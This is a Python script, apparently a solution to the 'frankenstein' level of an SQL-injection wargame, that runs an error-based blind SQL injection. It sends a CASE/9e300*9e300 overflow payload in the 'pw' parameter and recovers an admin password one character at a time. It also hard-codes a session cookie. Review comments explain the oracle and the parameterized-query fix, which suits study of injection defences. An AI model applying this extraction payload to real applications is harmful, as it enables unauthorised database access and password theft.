import requests
import time

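def request(payload):
    """Send one probe to the challenge page and report the boolean result.

    ``payload`` is sent as the ``pw`` query parameter; ``requests`` handles
    the URL encoding. Returns True when the response body contains the
    marker string "config.php", False otherwise.
    """
    url = "http://los.rubiya.kr/frankenstein_b5bab23e64777e1756174ad33f14b5db.php"
    params = {'pw': payload}
    # NOTE(review): a session id is hard-coded in published source. Treat it
    # as disclosed: it should be expired/rotated, and tooling should read
    # such values from the environment or a local config file instead.
    headers = {'Cookie': 'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    # Without a timeout a stalled connection blocks the whole run forever.
    response = requests.get(url, params=params, headers=headers, timeout=10)
    # NOTE(review): presumably the page prints its own source (which mentions
    # config.php) only when the query ran without a database error - confirm.
    # The HTTP status is not checked, so an expired session or an error page
    # is indistinguishable from a "false" answer.
    return "config.php" in response.text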

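# Candidate characters, tried in this order for every position.
strings = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
admin_pw = ""

# How the oracle works: the CASE expression tests whether admin's pw starts
# with the prefix recovered so far plus one candidate character. When the
# test is false the ELSE branch evaluates 9e300*9e300, which overflows a
# DOUBLE and makes the query fail, so "page rendered" vs. "query errored"
# leaks one bit per request. Defender's view: the root cause is user input
# concatenated into the SQL text; hiding error messages does not close this
# channel, parameterized queries do.
#
# NOTE(review): LIKE is case-insensitive under MySQL's default collations and
# lowercase letters come before uppercase in `strings`, so the letter case of
# the recovered value is not reliable - confirm against the target collation.
for i in range(1, 100):  # upper bound on the password length
    for candidate in strings:
        payload = "' or id='admin' and case when pw like '"+admin_pw+candidate+"%' then 1 else 9e300*9e300 end-- x "
        if request(payload):
            admin_pw += candidate
            break
    else:
        # No candidate extended the prefix: the value is complete (or holds a
        # character outside `strings`). The original compared the loop index
        # with the last position instead, which also stopped the search when
        # the final candidate was the one that matched. (Indentation was lost
        # in the page, so the original nesting is inferred.)
        break

# Parenthesized single-argument form runs under both Python 2 and Python 3.
print("Find Admin Pw[*] = " + admin_pw)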

